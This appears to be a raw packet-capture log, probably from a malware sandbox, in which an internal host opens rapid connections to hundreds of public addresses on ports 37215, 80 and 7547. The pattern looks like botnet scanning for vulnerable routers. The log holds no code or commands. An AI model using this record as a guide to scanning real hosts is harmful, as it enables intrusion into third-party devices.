                                          Nov 7, 2024 11:57:59.442970991 CET228880192.168.2.1382.37.190.84
                                          Nov 7, 2024 11:57:59.442974091 CET3721530704156.96.34.94192.168.2.13
                                          Nov 7, 2024 11:57:59.442980051 CET228880192.168.2.1382.128.237.130
                                          Nov 7, 2024 11:57:59.442985058 CET3721530704156.145.138.102192.168.2.13
                                          Nov 7, 2024 11:57:59.442994118 CET3721530704156.109.21.154192.168.2.13
                                          Nov 7, 2024 11:57:59.442996979 CET228880192.168.2.1382.27.248.111
                                          Nov 7, 2024 11:57:59.443000078 CET3070437215192.168.2.13156.27.213.175
                                          Nov 7, 2024 11:57:59.443000078 CET3070437215192.168.2.13156.221.221.77
                                          Nov 7, 2024 11:57:59.443001032 CET228880192.168.2.1382.86.166.146
                                          Nov 7, 2024 11:57:59.443000078 CET228880192.168.2.1382.109.190.169
                                          Nov 7, 2024 11:57:59.443003893 CET3721530704156.211.73.212192.168.2.13
                                          Nov 7, 2024 11:57:59.443005085 CET3070437215192.168.2.13156.96.34.94
                                          Nov 7, 2024 11:57:59.443006992 CET228880192.168.2.1382.144.216.122
                                          Nov 7, 2024 11:57:59.443011999 CET228880192.168.2.1382.14.31.161
                                          Nov 7, 2024 11:57:59.443015099 CET3070437215192.168.2.13156.145.138.102
                                          Nov 7, 2024 11:57:59.443016052 CET228880192.168.2.1382.201.227.140
                                          Nov 7, 2024 11:57:59.443016052 CET3721530704156.219.202.84192.168.2.13
                                          Nov 7, 2024 11:57:59.443022966 CET3070437215192.168.2.13156.109.21.154
                                          Nov 7, 2024 11:57:59.443025112 CET228880192.168.2.1382.42.176.172
                                          Nov 7, 2024 11:57:59.443025112 CET228880192.168.2.1382.240.232.35
                                          Nov 7, 2024 11:57:59.443028927 CET3721530704156.206.3.54192.168.2.13
                                          Nov 7, 2024 11:57:59.443034887 CET3070437215192.168.2.13156.211.73.212
                                          Nov 7, 2024 11:57:59.443039894 CET3721530704156.129.22.29192.168.2.13
                                          Nov 7, 2024 11:57:59.443041086 CET228880192.168.2.1382.149.73.240
                                          Nov 7, 2024 11:57:59.443049908 CET3721530704156.154.81.195192.168.2.13
                                          Nov 7, 2024 11:57:59.443052053 CET3070437215192.168.2.13156.219.202.84
                                          Nov 7, 2024 11:57:59.443061113 CET3721530704156.143.234.150192.168.2.13
                                          Nov 7, 2024 11:57:59.443062067 CET228880192.168.2.1382.197.142.140
                                          Nov 7, 2024 11:57:59.443063974 CET3070437215192.168.2.13156.206.3.54
                                          Nov 7, 2024 11:57:59.443063974 CET3070437215192.168.2.13156.129.22.29
                                          Nov 7, 2024 11:57:59.443074942 CET3070437215192.168.2.13156.154.81.195
                                          Nov 7, 2024 11:57:59.443074942 CET228880192.168.2.1382.181.76.224
                                          Nov 7, 2024 11:57:59.443098068 CET3070437215192.168.2.13156.143.234.150
                                          Nov 7, 2024 11:57:59.443100929 CET228880192.168.2.1382.95.221.156
                                          Nov 7, 2024 11:57:59.443113089 CET228880192.168.2.1382.73.82.173
                                          Nov 7, 2024 11:57:59.443113089 CET228880192.168.2.1382.2.111.238
                                          Nov 7, 2024 11:57:59.443113089 CET228880192.168.2.1382.203.104.8
                                          Nov 7, 2024 11:57:59.443124056 CET228880192.168.2.1382.117.93.44
                                          Nov 7, 2024 11:57:59.443125010 CET228880192.168.2.1382.17.15.251
                                          Nov 7, 2024 11:57:59.443140030 CET228880192.168.2.1382.39.115.41
                                          Nov 7, 2024 11:57:59.443141937 CET228880192.168.2.1382.119.8.130
                                          Nov 7, 2024 11:57:59.443151951 CET228880192.168.2.1382.125.144.53
                                          Nov 7, 2024 11:57:59.443151951 CET228880192.168.2.1382.144.25.73
                                          Nov 7, 2024 11:57:59.443161964 CET228880192.168.2.1382.85.22.77
                                          Nov 7, 2024 11:57:59.443161964 CET228880192.168.2.1382.154.98.156
                                          Nov 7, 2024 11:57:59.443166971 CET228880192.168.2.1382.14.127.86
                                          Nov 7, 2024 11:57:59.443173885 CET228880192.168.2.1382.143.54.151
                                          Nov 7, 2024 11:57:59.443181038 CET228880192.168.2.1382.232.16.252
                                          Nov 7, 2024 11:57:59.443191051 CET228880192.168.2.1382.98.40.178
                                          Nov 7, 2024 11:57:59.443197966 CET228880192.168.2.1382.123.53.38
                                          Nov 7, 2024 11:57:59.443200111 CET228880192.168.2.1382.121.8.101
                                          Nov 7, 2024 11:57:59.443202972 CET228880192.168.2.1382.50.177.7
                                          Nov 7, 2024 11:57:59.443202972 CET228880192.168.2.1382.20.170.223
                                          Nov 7, 2024 11:57:59.443207979 CET228880192.168.2.1382.31.95.106
                                          Nov 7, 2024 11:57:59.443212986 CET228880192.168.2.1382.107.87.116
                                          Nov 7, 2024 11:57:59.443216085 CET228880192.168.2.1382.182.144.91
                                          Nov 7, 2024 11:57:59.443221092 CET228880192.168.2.1382.148.188.119
                                          Nov 7, 2024 11:57:59.443231106 CET228880192.168.2.1382.159.173.14
                                          Nov 7, 2024 11:57:59.443233013 CET228880192.168.2.1382.149.58.203
                                          Nov 7, 2024 11:57:59.443239927 CET228880192.168.2.1382.40.153.47
                                          Nov 7, 2024 11:57:59.443242073 CET228880192.168.2.1382.80.96.228
                                          Nov 7, 2024 11:57:59.443248987 CET228880192.168.2.1382.98.214.139
                                          Nov 7, 2024 11:57:59.443264008 CET228880192.168.2.1382.119.109.64
                                          Nov 7, 2024 11:57:59.443265915 CET228880192.168.2.1382.214.239.115
                                          Nov 7, 2024 11:57:59.443272114 CET228880192.168.2.1382.40.135.83
                                          Nov 7, 2024 11:57:59.443274975 CET228880192.168.2.1382.142.47.170
                                          Nov 7, 2024 11:57:59.443274975 CET228880192.168.2.1382.198.101.195
                                          Nov 7, 2024 11:57:59.443288088 CET228880192.168.2.1382.35.110.22
                                          Nov 7, 2024 11:57:59.443298101 CET228880192.168.2.1382.88.166.160
                                          Nov 7, 2024 11:57:59.443298101 CET228880192.168.2.1382.149.75.172
                                          Nov 7, 2024 11:57:59.443303108 CET228880192.168.2.1382.77.137.147
                                          Nov 7, 2024 11:57:59.443317890 CET228880192.168.2.1382.165.163.69
                                          Nov 7, 2024 11:57:59.443325043 CET228880192.168.2.1382.38.84.44
                                          Nov 7, 2024 11:57:59.443330050 CET228880192.168.2.1382.30.215.81
                                          Nov 7, 2024 11:57:59.443330050 CET228880192.168.2.1382.166.78.49
                                          Nov 7, 2024 11:57:59.443334103 CET228880192.168.2.1382.147.18.150
                                          Nov 7, 2024 11:57:59.443341017 CET228880192.168.2.1382.38.62.198
                                          Nov 7, 2024 11:57:59.443342924 CET228880192.168.2.1382.248.65.111
                                          Nov 7, 2024 11:57:59.443350077 CET228880192.168.2.1382.224.227.15
                                          Nov 7, 2024 11:57:59.443357944 CET228880192.168.2.1382.94.225.84
                                          Nov 7, 2024 11:57:59.443371058 CET228880192.168.2.1382.156.11.7
                                          Nov 7, 2024 11:57:59.443377018 CET228880192.168.2.1382.98.238.196
                                          Nov 7, 2024 11:57:59.443377018 CET228880192.168.2.1382.93.93.107
                                          Nov 7, 2024 11:57:59.443384886 CET228880192.168.2.1382.198.214.101
                                          Nov 7, 2024 11:57:59.443387032 CET228880192.168.2.1382.158.242.171
                                          Nov 7, 2024 11:57:59.443408012 CET228880192.168.2.1382.70.75.71
                                          Nov 7, 2024 11:57:59.443408012 CET228880192.168.2.1382.230.113.91
                                          Nov 7, 2024 11:57:59.443408966 CET228880192.168.2.1382.20.56.248
                                          Nov 7, 2024 11:57:59.443412066 CET228880192.168.2.1382.167.10.51
                                          Nov 7, 2024 11:57:59.443412066 CET228880192.168.2.1382.80.76.152
                                          Nov 7, 2024 11:57:59.443423986 CET228880192.168.2.1382.122.201.188
                                          Nov 7, 2024 11:57:59.443423986 CET228880192.168.2.1382.231.76.73
                                          Nov 7, 2024 11:57:59.443448067 CET228880192.168.2.1382.196.29.8
                                          Nov 7, 2024 11:57:59.443448067 CET228880192.168.2.1382.71.193.166
                                          Nov 7, 2024 11:57:59.443454027 CET228880192.168.2.1382.112.24.100
                                          Nov 7, 2024 11:57:59.443456888 CET228880192.168.2.1382.193.180.90
                                          Nov 7, 2024 11:57:59.443459034 CET228880192.168.2.1382.105.211.130
                                          Nov 7, 2024 11:57:59.443459034 CET228880192.168.2.1382.120.184.200
                                          Nov 7, 2024 11:57:59.443460941 CET228880192.168.2.1382.209.61.142
                                          Nov 7, 2024 11:57:59.443460941 CET228880192.168.2.1382.73.181.158
                                          Nov 7, 2024 11:57:59.443463087 CET228880192.168.2.1382.85.32.224
                                          Nov 7, 2024 11:57:59.443460941 CET3721530704156.143.223.107192.168.2.13
                                          Nov 7, 2024 11:57:59.443469048 CET228880192.168.2.1382.148.176.56
                                          Nov 7, 2024 11:57:59.443475008 CET3721530704156.212.77.230192.168.2.13
                                          Nov 7, 2024 11:57:59.443480968 CET228880192.168.2.1382.17.182.102
                                          Nov 7, 2024 11:57:59.443486929 CET3721530704156.42.114.131192.168.2.13
                                          Nov 7, 2024 11:57:59.443489075 CET228880192.168.2.1382.212.22.113
                                          Nov 7, 2024 11:57:59.443489075 CET228880192.168.2.1382.113.102.213
                                          Nov 7, 2024 11:57:59.443489075 CET228880192.168.2.1382.196.47.190
                                          Nov 7, 2024 11:57:59.443497896 CET3721530704156.169.0.168192.168.2.13
                                          Nov 7, 2024 11:57:59.443509102 CET3721530704156.58.161.181192.168.2.13
                                          Nov 7, 2024 11:57:59.443511963 CET3070437215192.168.2.13156.143.223.107
                                          Nov 7, 2024 11:57:59.443511963 CET3070437215192.168.2.13156.42.114.131
                                          Nov 7, 2024 11:57:59.443512917 CET3070437215192.168.2.13156.212.77.230
                                          Nov 7, 2024 11:57:59.443520069 CET3721530704156.78.247.37192.168.2.13
                                          Nov 7, 2024 11:57:59.443528891 CET3070437215192.168.2.13156.169.0.168
                                          Nov 7, 2024 11:57:59.443528891 CET228880192.168.2.1382.50.198.144
                                          Nov 7, 2024 11:57:59.443531036 CET228880192.168.2.1382.152.143.3
                                          Nov 7, 2024 11:57:59.443531036 CET228880192.168.2.1382.170.41.195
                                          Nov 7, 2024 11:57:59.443531036 CET228880192.168.2.1382.171.86.87
                                          Nov 7, 2024 11:57:59.443537951 CET3070437215192.168.2.13156.58.161.181
                                          Nov 7, 2024 11:57:59.443537951 CET228880192.168.2.1382.163.31.128
                                          Nov 7, 2024 11:57:59.443543911 CET228880192.168.2.1382.220.37.144
                                          Nov 7, 2024 11:57:59.443551064 CET3070437215192.168.2.13156.78.247.37
                                          Nov 7, 2024 11:57:59.443559885 CET228880192.168.2.1382.202.49.177
                                          Nov 7, 2024 11:57:59.443576097 CET3721530704156.220.174.150192.168.2.13
                                          Nov 7, 2024 11:57:59.443579912 CET228880192.168.2.1382.236.232.210
                                          Nov 7, 2024 11:57:59.443584919 CET228880192.168.2.1382.19.53.43
                                          Nov 7, 2024 11:57:59.443586111 CET3721530704156.85.36.198192.168.2.13
                                          Nov 7, 2024 11:57:59.443595886 CET228880192.168.2.1382.48.246.32
                                          Nov 7, 2024 11:57:59.443595886 CET3721530704156.74.181.98192.168.2.13
                                          Nov 7, 2024 11:57:59.443603039 CET228880192.168.2.1382.31.254.168
                                          Nov 7, 2024 11:57:59.443603039 CET228880192.168.2.1382.81.187.142
                                          Nov 7, 2024 11:57:59.443605900 CET3070437215192.168.2.13156.220.174.150
                                          Nov 7, 2024 11:57:59.443607092 CET228880192.168.2.1382.72.69.59
                                          Nov 7, 2024 11:57:59.443607092 CET228880192.168.2.1382.55.226.183
                                          Nov 7, 2024 11:57:59.443607092 CET228880192.168.2.1382.169.169.68
                                          Nov 7, 2024 11:57:59.443607092 CET228880192.168.2.1382.75.40.237
                                          Nov 7, 2024 11:57:59.443609953 CET3721530704156.254.210.135192.168.2.13
                                          Nov 7, 2024 11:57:59.443620920 CET228880192.168.2.1382.109.243.83
                                          Nov 7, 2024 11:57:59.443620920 CET3721530704156.17.88.18192.168.2.13
                                          Nov 7, 2024 11:57:59.443628073 CET3070437215192.168.2.13156.85.36.198
                                          Nov 7, 2024 11:57:59.443628073 CET228880192.168.2.1382.245.177.9
                                          Nov 7, 2024 11:57:59.443631887 CET3721530704156.29.147.28192.168.2.13
                                          Nov 7, 2024 11:57:59.443630934 CET3070437215192.168.2.13156.74.181.98
                                          Nov 7, 2024 11:57:59.443641901 CET3721530704156.38.101.128192.168.2.13
                                          Nov 7, 2024 11:57:59.443648100 CET3070437215192.168.2.13156.254.210.135
                                          Nov 7, 2024 11:57:59.443651915 CET3721530704156.38.16.143192.168.2.13
                                          Nov 7, 2024 11:57:59.443653107 CET3070437215192.168.2.13156.17.88.18
                                          Nov 7, 2024 11:57:59.443660975 CET228880192.168.2.1382.200.33.51
                                          Nov 7, 2024 11:57:59.443661928 CET228880192.168.2.1382.120.212.115
                                          Nov 7, 2024 11:57:59.443664074 CET3721530704156.218.153.21192.168.2.13
                                          Nov 7, 2024 11:57:59.443667889 CET228880192.168.2.1382.136.173.102
                                          Nov 7, 2024 11:57:59.443672895 CET3070437215192.168.2.13156.38.101.128
                                          Nov 7, 2024 11:57:59.443674088 CET3721530704156.44.137.90192.168.2.13
                                          Nov 7, 2024 11:57:59.443675995 CET3070437215192.168.2.13156.29.147.28
                                          Nov 7, 2024 11:57:59.443684101 CET228880192.168.2.1382.235.59.252
                                          Nov 7, 2024 11:57:59.443686962 CET3070437215192.168.2.13156.38.16.143
                                          Nov 7, 2024 11:57:59.443690062 CET228880192.168.2.1382.57.89.1
                                          Nov 7, 2024 11:57:59.443694115 CET3721530704156.5.144.100192.168.2.13
                                          Nov 7, 2024 11:57:59.443696022 CET3070437215192.168.2.13156.218.153.21
                                          Nov 7, 2024 11:57:59.443700075 CET228880192.168.2.1382.20.205.25
                                          Nov 7, 2024 11:57:59.443705082 CET3721530704156.147.51.14192.168.2.13
                                          Nov 7, 2024 11:57:59.443708897 CET3070437215192.168.2.13156.44.137.90
                                          Nov 7, 2024 11:57:59.443712950 CET228880192.168.2.1382.236.1.12
                                          Nov 7, 2024 11:57:59.443715096 CET3721530704156.234.56.44192.168.2.13
                                          Nov 7, 2024 11:57:59.443726063 CET3721530704156.252.110.78192.168.2.13
                                          Nov 7, 2024 11:57:59.443726063 CET228880192.168.2.1382.194.77.10
                                          Nov 7, 2024 11:57:59.443726063 CET228880192.168.2.1382.9.119.191
                                          Nov 7, 2024 11:57:59.443727970 CET3070437215192.168.2.13156.5.144.100
                                          Nov 7, 2024 11:57:59.443728924 CET228880192.168.2.1382.92.127.175
                                          Nov 7, 2024 11:57:59.443737030 CET3721530704156.133.16.31192.168.2.13
                                          Nov 7, 2024 11:57:59.443741083 CET228880192.168.2.1382.246.147.45
                                          Nov 7, 2024 11:57:59.443746090 CET228880192.168.2.1382.71.194.17
                                          Nov 7, 2024 11:57:59.443746090 CET3070437215192.168.2.13156.147.51.14
                                          Nov 7, 2024 11:57:59.443747044 CET3070437215192.168.2.13156.234.56.44
                                          Nov 7, 2024 11:57:59.443747044 CET3721530704156.54.55.139192.168.2.13
                                          Nov 7, 2024 11:57:59.443747997 CET228880192.168.2.1382.123.50.194
                                          Nov 7, 2024 11:57:59.443758011 CET3721530704156.240.218.176192.168.2.13
                                          Nov 7, 2024 11:57:59.443766117 CET3070437215192.168.2.13156.252.110.78
                                          Nov 7, 2024 11:57:59.443768978 CET3721530704156.89.135.165192.168.2.13
                                          Nov 7, 2024 11:57:59.443773985 CET3070437215192.168.2.13156.133.16.31
                                          Nov 7, 2024 11:57:59.443779945 CET3721530704156.38.231.133192.168.2.13
                                          Nov 7, 2024 11:57:59.443783045 CET228880192.168.2.1382.183.129.6
                                          Nov 7, 2024 11:57:59.443787098 CET228880192.168.2.1382.157.82.26
                                          Nov 7, 2024 11:57:59.443789005 CET228880192.168.2.1382.147.153.227
                                          Nov 7, 2024 11:57:59.443792105 CET3721530704156.176.189.209192.168.2.13
                                          Nov 7, 2024 11:57:59.443792105 CET3070437215192.168.2.13156.54.55.139
                                          Nov 7, 2024 11:57:59.443800926 CET3070437215192.168.2.13156.89.135.165
                                          Nov 7, 2024 11:57:59.443802118 CET3721530704156.171.32.16192.168.2.13
                                          Nov 7, 2024 11:57:59.443808079 CET3070437215192.168.2.13156.240.218.176
                                          Nov 7, 2024 11:57:59.443808079 CET228880192.168.2.1382.109.247.130
                                          Nov 7, 2024 11:57:59.443808079 CET228880192.168.2.1382.120.191.242
                                          Nov 7, 2024 11:57:59.443815947 CET3721530704156.56.236.167192.168.2.13
                                          Nov 7, 2024 11:57:59.443818092 CET228880192.168.2.1382.125.148.208
                                          Nov 7, 2024 11:57:59.443818092 CET228880192.168.2.1382.75.245.116
                                          Nov 7, 2024 11:57:59.443819046 CET3070437215192.168.2.13156.38.231.133
                                          Nov 7, 2024 11:57:59.443819046 CET228880192.168.2.1382.8.39.93
                                          Nov 7, 2024 11:57:59.443825006 CET3070437215192.168.2.13156.176.189.209
                                          Nov 7, 2024 11:57:59.443830013 CET228880192.168.2.1382.164.79.212
                                          Nov 7, 2024 11:57:59.443830013 CET228880192.168.2.1382.86.238.206
                                          Nov 7, 2024 11:57:59.443837881 CET3070437215192.168.2.13156.171.32.16
                                          Nov 7, 2024 11:57:59.443839073 CET228880192.168.2.1382.206.31.149
                                          Nov 7, 2024 11:57:59.443845987 CET3070437215192.168.2.13156.56.236.167
                                          Nov 7, 2024 11:57:59.443852901 CET228880192.168.2.1382.88.34.212
                                          Nov 7, 2024 11:57:59.443859100 CET228880192.168.2.1382.159.71.107
                                          Nov 7, 2024 11:57:59.443870068 CET228880192.168.2.1382.206.186.154
                                          Nov 7, 2024 11:57:59.443876028 CET228880192.168.2.1382.43.209.108
                                          Nov 7, 2024 11:57:59.443876982 CET228880192.168.2.1382.180.102.94
                                          Nov 7, 2024 11:57:59.443877935 CET228880192.168.2.1382.122.126.248
                                          Nov 7, 2024 11:57:59.443883896 CET228880192.168.2.1382.128.98.78
                                          Nov 7, 2024 11:57:59.443893909 CET228880192.168.2.1382.134.172.18
                                          Nov 7, 2024 11:57:59.443902969 CET228880192.168.2.1382.160.250.158
                                          Nov 7, 2024 11:57:59.443922997 CET228880192.168.2.1382.7.187.171
                                          Nov 7, 2024 11:57:59.443924904 CET228880192.168.2.1382.215.56.206
                                          Nov 7, 2024 11:57:59.443927050 CET228880192.168.2.1382.228.78.29
                                          Nov 7, 2024 11:57:59.443927050 CET228880192.168.2.1382.109.158.67
                                          Nov 7, 2024 11:57:59.443928957 CET228880192.168.2.1382.92.11.11
                                          Nov 7, 2024 11:57:59.443928957 CET228880192.168.2.1382.55.39.46
                                          Nov 7, 2024 11:57:59.443938017 CET228880192.168.2.1382.74.210.147
                                          Nov 7, 2024 11:57:59.443941116 CET228880192.168.2.1382.200.165.207
                                          Nov 7, 2024 11:57:59.443948030 CET228880192.168.2.1382.92.209.243
                                          Nov 7, 2024 11:57:59.443959951 CET228880192.168.2.1382.141.107.111
                                          Nov 7, 2024 11:57:59.443959951 CET228880192.168.2.1382.125.147.143
                                          Nov 7, 2024 11:57:59.443963051 CET228880192.168.2.1382.143.227.181
                                          Nov 7, 2024 11:57:59.443964005 CET228880192.168.2.1382.13.77.151
                                          Nov 7, 2024 11:57:59.443974972 CET228880192.168.2.1382.204.11.121
                                          Nov 7, 2024 11:57:59.443990946 CET228880192.168.2.1382.252.140.97
                                          Nov 7, 2024 11:57:59.443998098 CET228880192.168.2.1382.34.205.157
                                          Nov 7, 2024 11:57:59.444003105 CET228880192.168.2.1382.34.251.236
                                          Nov 7, 2024 11:57:59.444025993 CET228880192.168.2.1382.66.62.108
                                          Nov 7, 2024 11:57:59.444027901 CET228880192.168.2.1382.249.248.51
                                          Nov 7, 2024 11:57:59.444679976 CET3721530704156.227.1.83192.168.2.13
                                          Nov 7, 2024 11:57:59.444690943 CET3721530704156.77.250.169192.168.2.13
                                          Nov 7, 2024 11:57:59.444724083 CET3070437215192.168.2.13156.227.1.83
                                          Nov 7, 2024 11:57:59.444725037 CET3070437215192.168.2.13156.77.250.169
                                          Nov 7, 2024 11:57:59.444761992 CET3721530704156.25.65.23192.168.2.13
                                          Nov 7, 2024 11:57:59.444772959 CET3721530704156.38.55.224192.168.2.13
                                          Nov 7, 2024 11:57:59.444782972 CET3721530704156.34.228.218192.168.2.13
                                          Nov 7, 2024 11:57:59.444793940 CET3721530704156.71.8.192192.168.2.13
                                          Nov 7, 2024 11:57:59.444801092 CET3070437215192.168.2.13156.25.65.23
                                          Nov 7, 2024 11:57:59.444802999 CET3721530704156.46.21.113192.168.2.13
                                          Nov 7, 2024 11:57:59.444814920 CET3721530704156.191.112.122192.168.2.13
                                          Nov 7, 2024 11:57:59.444818020 CET3070437215192.168.2.13156.38.55.224
                                          Nov 7, 2024 11:57:59.444823027 CET3070437215192.168.2.13156.34.228.218
                                          Nov 7, 2024 11:57:59.444823027 CET3070437215192.168.2.13156.71.8.192
                                          Nov 7, 2024 11:57:59.444824934 CET3721530704156.202.190.95192.168.2.13
                                          Nov 7, 2024 11:57:59.444844961 CET3070437215192.168.2.13156.46.21.113
                                          Nov 7, 2024 11:57:59.444847107 CET3721530704156.80.4.222192.168.2.13
                                          Nov 7, 2024 11:57:59.444853067 CET3070437215192.168.2.13156.191.112.122
                                          Nov 7, 2024 11:57:59.444856882 CET3721530704156.239.192.238192.168.2.13
                                          Nov 7, 2024 11:57:59.444869041 CET3721530704156.186.173.186192.168.2.13
                                          Nov 7, 2024 11:57:59.444873095 CET3070437215192.168.2.13156.80.4.222
                                          Nov 7, 2024 11:57:59.444878101 CET3721530704156.69.155.0192.168.2.13
                                          Nov 7, 2024 11:57:59.444890976 CET3721530704156.88.61.42192.168.2.13
                                          Nov 7, 2024 11:57:59.444891930 CET3070437215192.168.2.13156.202.190.95
                                          Nov 7, 2024 11:57:59.444892883 CET3070437215192.168.2.13156.239.192.238
                                          Nov 7, 2024 11:57:59.444897890 CET3070437215192.168.2.13156.186.173.186
                                          Nov 7, 2024 11:57:59.444907904 CET3721530704156.118.242.246192.168.2.13
                                          Nov 7, 2024 11:57:59.444911003 CET3070437215192.168.2.13156.69.155.0
                                          Nov 7, 2024 11:57:59.444919109 CET3721530704156.168.217.83192.168.2.13
                                          Nov 7, 2024 11:57:59.444930077 CET3721530704156.75.181.114192.168.2.13
                                          Nov 7, 2024 11:57:59.444938898 CET3070437215192.168.2.13156.118.242.246
                                          Nov 7, 2024 11:57:59.444940090 CET3721530704156.68.120.193192.168.2.13
                                          Nov 7, 2024 11:57:59.444950104 CET3721530704156.224.121.119192.168.2.13
                                          Nov 7, 2024 11:57:59.444960117 CET3721530704156.62.50.179192.168.2.13
                                          Nov 7, 2024 11:57:59.444962025 CET3070437215192.168.2.13156.168.217.83
                                          Nov 7, 2024 11:57:59.444969893 CET3070437215192.168.2.13156.68.120.193
                                          Nov 7, 2024 11:57:59.444971085 CET3721530704156.153.217.196192.168.2.13
                                          Nov 7, 2024 11:57:59.444977045 CET3070437215192.168.2.13156.88.61.42
                                          Nov 7, 2024 11:57:59.444977999 CET3070437215192.168.2.13156.75.181.114
                                          Nov 7, 2024 11:57:59.444977999 CET3070437215192.168.2.13156.224.121.119
                                          Nov 7, 2024 11:57:59.444983006 CET3721530704156.246.168.96192.168.2.13
                                          Nov 7, 2024 11:57:59.444988012 CET3070437215192.168.2.13156.62.50.179
                                          Nov 7, 2024 11:57:59.444993019 CET3721530704156.0.141.141192.168.2.13
                                          Nov 7, 2024 11:57:59.445003986 CET3721530704156.161.73.186192.168.2.13
                                          Nov 7, 2024 11:57:59.445013046 CET3070437215192.168.2.13156.246.168.96
                                          Nov 7, 2024 11:57:59.445024014 CET3070437215192.168.2.13156.153.217.196
                                          Nov 7, 2024 11:57:59.445024014 CET3070437215192.168.2.13156.0.141.141
                                          Nov 7, 2024 11:57:59.445039034 CET3070437215192.168.2.13156.161.73.186
                                          Nov 7, 2024 11:57:59.445163012 CET754753228173.66.213.27192.168.2.13
                                          Nov 7, 2024 11:57:59.445173025 CET3721530704156.46.43.137192.168.2.13
                                          Nov 7, 2024 11:57:59.445183039 CET3721530704156.53.55.74192.168.2.13
                                          Nov 7, 2024 11:57:59.445193052 CET3721530704156.71.68.156192.168.2.13
                                          Nov 7, 2024 11:57:59.445209980 CET532287547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:59.445210934 CET3070437215192.168.2.13156.53.55.74
                                          Nov 7, 2024 11:57:59.445210934 CET3070437215192.168.2.13156.46.43.137
                                          Nov 7, 2024 11:57:59.445221901 CET3070437215192.168.2.13156.71.68.156
                                          Nov 7, 2024 11:57:59.445673943 CET489627547192.168.2.1366.163.163.254
                                          Nov 7, 2024 11:57:59.445682049 CET3721530704156.147.88.94192.168.2.13
                                          Nov 7, 2024 11:57:59.445688009 CET228880192.168.2.1382.195.247.216
                                          Nov 7, 2024 11:57:59.445693016 CET3721530704156.224.249.109192.168.2.13
                                          Nov 7, 2024 11:57:59.445698977 CET228880192.168.2.1382.0.226.191
                                          Nov 7, 2024 11:57:59.445704937 CET228880192.168.2.1382.207.165.30
                                          Nov 7, 2024 11:57:59.445708990 CET228880192.168.2.1382.49.187.195
                                          Nov 7, 2024 11:57:59.445708990 CET228880192.168.2.1382.181.3.239
                                          Nov 7, 2024 11:57:59.445712090 CET3721530704156.77.247.196192.168.2.13
                                          Nov 7, 2024 11:57:59.445717096 CET3070437215192.168.2.13156.147.88.94
                                          Nov 7, 2024 11:57:59.445722103 CET3721530704156.9.33.22192.168.2.13
                                          Nov 7, 2024 11:57:59.445727110 CET3070437215192.168.2.13156.224.249.109
                                          Nov 7, 2024 11:57:59.445732117 CET228880192.168.2.1382.190.78.97
                                          Nov 7, 2024 11:57:59.445733070 CET3721530704156.226.199.61192.168.2.13
                                          Nov 7, 2024 11:57:59.445744038 CET3721530704156.42.165.171192.168.2.13
                                          Nov 7, 2024 11:57:59.445745945 CET3070437215192.168.2.13156.77.247.196
                                          Nov 7, 2024 11:57:59.445749998 CET228880192.168.2.1382.143.178.32
                                          Nov 7, 2024 11:57:59.445749998 CET3070437215192.168.2.13156.9.33.22
                                          Nov 7, 2024 11:57:59.445750952 CET228880192.168.2.1382.131.222.5
                                          Nov 7, 2024 11:57:59.445754051 CET3721530704156.106.60.227192.168.2.13
                                          Nov 7, 2024 11:57:59.445755005 CET228880192.168.2.1382.55.219.5
                                          Nov 7, 2024 11:57:59.445765018 CET228880192.168.2.1382.90.254.80
                                          Nov 7, 2024 11:57:59.445765018 CET3070437215192.168.2.13156.226.199.61
                                          Nov 7, 2024 11:57:59.445776939 CET3070437215192.168.2.13156.42.165.171
                                          Nov 7, 2024 11:57:59.445786953 CET3070437215192.168.2.13156.106.60.227
                                          Nov 7, 2024 11:57:59.445787907 CET3721530704156.82.94.253192.168.2.13
                                          Nov 7, 2024 11:57:59.445791960 CET228880192.168.2.1382.64.132.33
                                          Nov 7, 2024 11:57:59.445796013 CET228880192.168.2.1382.92.240.90
                                          Nov 7, 2024 11:57:59.445797920 CET3721530704156.132.225.184192.168.2.13
                                          Nov 7, 2024 11:57:59.445802927 CET228880192.168.2.1382.120.53.116
                                          Nov 7, 2024 11:57:59.445806980 CET228880192.168.2.1382.236.136.180
                                          Nov 7, 2024 11:57:59.445808887 CET3721530704156.103.225.198192.168.2.13
                                          Nov 7, 2024 11:57:59.445818901 CET3721530704156.16.0.245192.168.2.13
                                          Nov 7, 2024 11:57:59.445822001 CET228880192.168.2.1382.170.73.144
                                          Nov 7, 2024 11:57:59.445822001 CET228880192.168.2.1382.222.141.45
                                          Nov 7, 2024 11:57:59.445822001 CET228880192.168.2.1382.36.53.71
                                          Nov 7, 2024 11:57:59.445827961 CET3721530704156.215.89.202192.168.2.13
                                          Nov 7, 2024 11:57:59.445830107 CET3070437215192.168.2.13156.82.94.253
                                          Nov 7, 2024 11:57:59.445830107 CET3070437215192.168.2.13156.132.225.184
                                          Nov 7, 2024 11:57:59.445832968 CET228880192.168.2.1382.210.209.145
                                          Nov 7, 2024 11:57:59.445832968 CET228880192.168.2.1382.198.0.118
                                          Nov 7, 2024 11:57:59.445839882 CET3721530704156.202.233.234192.168.2.13
                                          Nov 7, 2024 11:57:59.445846081 CET3070437215192.168.2.13156.103.225.198
                                          Nov 7, 2024 11:57:59.445849895 CET3721530704156.181.110.157192.168.2.13
                                          Nov 7, 2024 11:57:59.445857048 CET228880192.168.2.1382.114.214.199
                                          Nov 7, 2024 11:57:59.445858002 CET3070437215192.168.2.13156.16.0.245
                                          Nov 7, 2024 11:57:59.445858955 CET228880192.168.2.1382.156.165.58
                                          Nov 7, 2024 11:57:59.445861101 CET3721530704156.138.200.176192.168.2.13
                                          Nov 7, 2024 11:57:59.445872068 CET3721530704156.47.140.194192.168.2.13
                                          Nov 7, 2024 11:57:59.445879936 CET3070437215192.168.2.13156.181.110.157
                                          Nov 7, 2024 11:57:59.445879936 CET3070437215192.168.2.13156.215.89.202
                                          Nov 7, 2024 11:57:59.445884943 CET3070437215192.168.2.13156.202.233.234
                                          Nov 7, 2024 11:57:59.445884943 CET228880192.168.2.1382.170.19.122
                                          Nov 7, 2024 11:57:59.445890903 CET3721530704156.211.240.190192.168.2.13
                                          Nov 7, 2024 11:57:59.445892096 CET3070437215192.168.2.13156.138.200.176
                                          Nov 7, 2024 11:57:59.445900917 CET228880192.168.2.1382.66.130.84
                                          Nov 7, 2024 11:57:59.445900917 CET228880192.168.2.1382.84.56.189
                                          Nov 7, 2024 11:57:59.445902109 CET3721530704156.43.64.11192.168.2.13
                                          Nov 7, 2024 11:57:59.445900917 CET3070437215192.168.2.13156.47.140.194
                                          Nov 7, 2024 11:57:59.445908070 CET228880192.168.2.1382.104.173.44
                                          Nov 7, 2024 11:57:59.445910931 CET228880192.168.2.1382.236.30.230
